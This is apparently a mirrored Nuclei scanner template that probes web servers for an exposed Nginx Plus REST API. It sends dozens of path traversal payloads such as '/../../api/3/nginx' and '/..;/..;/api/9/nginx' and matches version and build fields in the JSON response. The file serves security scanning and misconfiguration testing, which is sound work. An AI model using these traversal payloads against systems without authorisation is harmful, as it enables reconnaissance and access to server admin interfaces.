mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-10 20:53:27 +08:00
110 lines
3.3 KiB
YAML
110 lines
3.3 KiB
YAML
id: nginx-api-traversal
|
|
|
|
info:
|
|
name: Nginx Plus Rest API - Traversal
|
|
author: encodedguy
|
|
severity: high
|
|
description: |
|
|
Access to Nginx Plus Rest API was discovered.
|
|
reference:
|
|
- https://nginx.org/en/docs/http/ngx_http_api_module.html
|
|
- https://x.com/akshaysharma71/status/1825815869953552844
|
|
metadata:
|
|
verified: true
|
|
tags: nginx,fuzz,misconfig,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}{{paths}}"
|
|
|
|
payloads:
|
|
paths:
|
|
- "/api/1/nginx"
|
|
- "/api/2/nginx"
|
|
- "/api/3/nginx"
|
|
- "/api/5/nginx"
|
|
- "/api/9/nginx"
|
|
- "/../../../../../../api/1/nginx"
|
|
- "/../../../../../../api/2/nginx"
|
|
- "/../../../../../../api/3/nginx"
|
|
- "/../../../../../../api/5/nginx"
|
|
- "/../../../../../../api/9/nginx"
|
|
- "/../../../../../api/1/nginx"
|
|
- "/../../../../../api/2/nginx"
|
|
- "/../../../../../api/3/nginx"
|
|
- "/../../../../../api/5/nginx"
|
|
- "/../../../../../api/9/nginx"
|
|
- "/../../../../api/1/nginx"
|
|
- "/../../../../api/2/nginx"
|
|
- "/../../../../api/3/nginx"
|
|
- "/../../../../api/5/nginx"
|
|
- "/../../../../api/9/nginx"
|
|
- "/../../../api/1/nginx"
|
|
- "/../../../api/2/nginx"
|
|
- "/../../../api/3/nginx"
|
|
- "/../../../api/5/nginx"
|
|
- "/../../../api/9/nginx"
|
|
- "/../../api/1/nginx"
|
|
- "/../../api/2/nginx"
|
|
- "/../../api/3/nginx"
|
|
- "/../../api/5/nginx"
|
|
- "/../../api/9/nginx"
|
|
- "/../api/1/nginx"
|
|
- "/../api/2/nginx"
|
|
- "/../api/3/nginx"
|
|
- "/../api/5/nginx"
|
|
- "/../api/9/nginx"
|
|
- "/..;/..;/..;/..;/..;/..;/api/1/nginx"
|
|
- "/..;/..;/..;/..;/..;/..;/api/2/nginx"
|
|
- "/..;/..;/..;/..;/..;/..;/api/3/nginx"
|
|
- "/..;/..;/..;/..;/..;/..;/api/5/nginx"
|
|
- "/..;/..;/..;/..;/..;/..;/api/9/nginx"
|
|
- "/..;/..;/..;/..;/..;/api/1/nginx"
|
|
- "/..;/..;/..;/..;/..;/api/2/nginx"
|
|
- "/..;/..;/..;/..;/..;/api/3/nginx"
|
|
- "/..;/..;/..;/..;/..;/api/5/nginx"
|
|
- "/..;/..;/..;/..;/..;/api/9/nginx"
|
|
- "/..;/..;/..;/..;/api/1/nginx"
|
|
- "/..;/..;/..;/..;/api/2/nginx"
|
|
- "/..;/..;/..;/..;/api/3/nginx"
|
|
- "/..;/..;/..;/..;/api/5/nginx"
|
|
- "/..;/..;/..;/..;/api/9/nginx"
|
|
- "/..;/..;/..;/api/1/nginx"
|
|
- "/..;/..;/..;/api/2/nginx"
|
|
- "/..;/..;/..;/api/3/nginx"
|
|
- "/..;/..;/..;/api/5/nginx"
|
|
- "/..;/..;/..;/api/9/nginx"
|
|
- "/..;/..;/api/1/nginx"
|
|
- "/..;/..;/api/2/nginx"
|
|
- "/..;/..;/api/3/nginx"
|
|
- "/..;/..;/api/5/nginx"
|
|
- "/..;/..;/api/9/nginx"
|
|
- "/..;/api/1/nginx"
|
|
- "/..;/api/2/nginx"
|
|
- "/..;/api/3/nginx"
|
|
- "/..;/api/5/nginx"
|
|
- "/..;/api/9/nginx"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "version"
|
|
- "build"
|
|
- "address"
|
|
- "load_timestamp"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: content_type
|
|
words:
|
|
- application/json
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100da1966297d3d5398d0af2daf677a09472a1dd6048750105d56c61849f06776a802202c213f77c56ec5ef2d354a8553b221728029136eed7b4a86114d2274d9df9bef:922c64590222798bb761d5b6d8e72950 |